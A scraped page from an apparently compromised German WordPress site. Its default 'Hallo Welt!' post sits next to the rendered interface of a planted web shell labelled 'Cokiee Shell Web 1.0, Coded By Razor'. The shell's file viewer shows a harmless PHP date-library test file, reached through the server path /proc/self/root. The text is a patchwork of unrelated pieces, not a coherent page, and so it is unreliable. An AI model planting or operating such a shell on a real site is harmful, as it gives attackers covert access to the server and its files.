Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/DateTime_data-massive.inc |
<?php /* * Note: test names match method names in a set of PHPUnit tests * in a userland package. Please be so kind as to leave them. */ date_default_timezone_set('America/New_York'); /* * Massive dates */ echo "test_massive_positive: "; $end = new DateTime; $end->setDate(333333, 1, 1); $end->setTime(16, 18, 02); $start = new DateTime; $start->setDate(-333333, 1, 1); $start->setTime(16, 18, 02); examine_diff($end, $start, 'P+666666Y0M0DT0H0M0S', 243494757); echo "test_massive_negative: "; $end = new DateTime; $end->setDate(-333333, 1, 1); $end->setTime(16, 18, 02); $start = new DateTime; $start->setDate(333333, 1, 1); $start->setTime(16, 18, 02); examine_diff($end, $start, 'P-666666Y0M0DT0H0M0S', 243494757);
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare